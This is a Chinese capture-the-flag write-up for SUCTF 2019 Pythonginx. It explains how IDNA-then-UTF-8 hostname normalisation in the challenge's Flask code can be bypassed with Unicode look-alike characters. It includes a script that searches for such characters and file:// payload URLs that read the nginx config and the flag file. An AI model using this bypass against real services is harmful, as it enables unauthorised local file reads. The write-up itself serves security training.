编码转换导致问题

前言

环境:[SUCTF 2019]Pythonginx
知识点:python脚本，ngnix配置文件
参考:wp

做题

源码

@app.route('/getUrl', methods=['GET', 'POST']) 
def getUrl(): 
	url = request.args.get("url") #以get的形式获取url的值
	host = parse.urlparse(url).hostname #得到url中的host部分
	if host == 'suctf.cc': 
		return "我扌 your problem? 111" 
	parts = list(urlsplit(url)) #把url通过urlsplit打散，将其转换为列表
	host = parts[1] 
	if host == 'suctf.cc': 
		return "我扌 your problem? 222 " + host 
	newhost = [] 
	for h in host.split('.'): #将host以.分割
		newhost.append(h.encode('idna').decode('utf-8'))#将打散的各个部分以idna编码再以utf-8解码放进数组中 
	parts[1] = '.'.join(newhost)#以.为连接方式将数组各个元素连接起来 
	finalUrl = urlunsplit(parts).split(' ')[0]#urlunsplit将parts以url的形式连接起来，去除url中的空格 
	host = parse.urlparse(finalUrl).hostname 
	if host == 'suctf.cc': 
		return urllib.request.urlopen(finalUrl).read()#读取文件 
	else: return "我扌 your problem? 333"

漏洞点在于newhost.append(h.encode('idna').decode('utf-8'))

这里以idna形式编码，再以utf-8解码，转换来转换去，标准还不一样，搞不好有什么问题

for i in range(128,65537):    
    tmp=chr(i)    
    try:        
        res = tmp.encode('idna').decode('utf-8')        
        if '-' in res:#很多的字符里面都有-,它们不是我们想要的，故去除
            continue
        print("U:{}    A:{}      ascii:{} ".format(tmp, res, i))    
    except:        
        pass#空语句，什么也不干

只要编码前不是c，编码后是c的字符通通满足我们的要求

ℂ,Ⅽ,℆ 之类的都可以

访问?url=file://suctf.cℭ/usr/local/nginx/conf/nginx.conf

再访问?url=file://suctf.cℭ/usr/fffffflag